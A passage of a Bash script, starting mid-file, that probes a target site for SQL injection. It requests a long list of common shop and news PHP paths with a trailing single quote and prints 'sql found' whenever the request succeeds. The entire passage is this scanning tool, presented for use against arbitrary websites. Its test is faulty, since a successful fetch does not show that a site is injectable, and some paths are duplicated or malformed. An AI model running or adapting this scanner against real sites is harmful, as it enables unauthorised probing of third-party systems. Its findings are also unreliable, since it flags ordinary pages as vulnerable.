echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/product.php?sku='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/item.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/events?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/comments.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/products/?catID='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/modules.php?****="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/fshstatistic/index.php?PID="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/products/products.php?p="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/sport.php?revista='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/products.php?p='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/products.php?p='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/home.php?cat='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/news/shownewsarticle.php?articleid='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/discussions/10/9/?CategoryID='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/news.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/?page='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/index.php?page='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/item/detail.php?num="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/features/view.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/site/?details&prodid='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/product_info.php?products_id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/remixer.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/proddetails_print.php?prodid='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/pylones/item.php?item='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/index.php?cont='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/product.php?ItemId='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/video.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/detail.php?item_id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/filemanager.php?delete='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/index.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/article_preview.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/Pages/whichArticle.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/view_items.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/Sales/view_item.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/book.php?isbn='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/news/newsletter.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/shop/home.php?cat='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/designcenter/item.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/board/kboard.php?board='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/index.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/board/view_temp.php?table='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/magazine-details.php?magid='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/about.php?cartID='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/accinfo.php?cartId='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/acclogin.php?cartID='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/add.php?bookid='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/add_cart.php?num='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/addcart.php?'"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/addItem.php'"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/add-to-cart.php?ID='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/addToCart.php?idProduct='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/addToCart.php?idProduct='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adminEditProductFields.php?intProdID='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/advSearch_h.php?idCategory='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/affiliate-agreement.cfm?storeid='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/affiliates.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/ancillary.php?ID='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/archive.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/article.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/phpx?PageID'"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/basket.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/Book.php?bookID='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/book_list.php?bookid='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/book_view.php?bookid='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/BookDetails.php?ID='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/browse.php?catid='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/browse_item_details.php'"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/Browse_Item_Details.php?Store_Id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/buy.php?'"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/buy.php?bookid='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/
bycategory.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/cardinfo.php?card='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/cart.php?action='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/cart.php?cart_id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/cart.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/cart_additem.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/cart_validate.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/cartadd.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/cat.php?iCat='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/catalog.php'"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/catalog.php?CatalogID='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/catalog_item.php?ID='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/catalog_main.php?catid='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/category.php'"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/category.php?catid='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/category_list.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/categorydisplay.php?catid='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/categorydisplay.php?catid='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/checkout.php?UserID='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/checkout_confirmed.php?order_id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/checkout1.php?cartid='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/comersus_listCategoriesAndProducts.php?idCategory='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/comersus_optEmailToFriendForm.php?idProduct='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/comersus_optReviewReadExec.php?idProduct='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/comersus_viewItem.php?idProduct='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/comments_form.php?ID='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/contact.php?cartId='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/content.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/customerService.php?****ID1='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/default.php?catID='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/description.php?bookid='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/details.php?BookID='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/details.php?Press_Release_ID='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/details.php?Product_ID='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/display_item.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/details.php?Service_ID='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/displayproducts.php'"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/downloadTrial.php?intProdID='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/emailproduct.php?itemid='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/emailToFriend.php?idProduct='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/events.php?ID='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/faq.php?cartID='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/faq_list.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/faqs.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/feedback.php?title='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
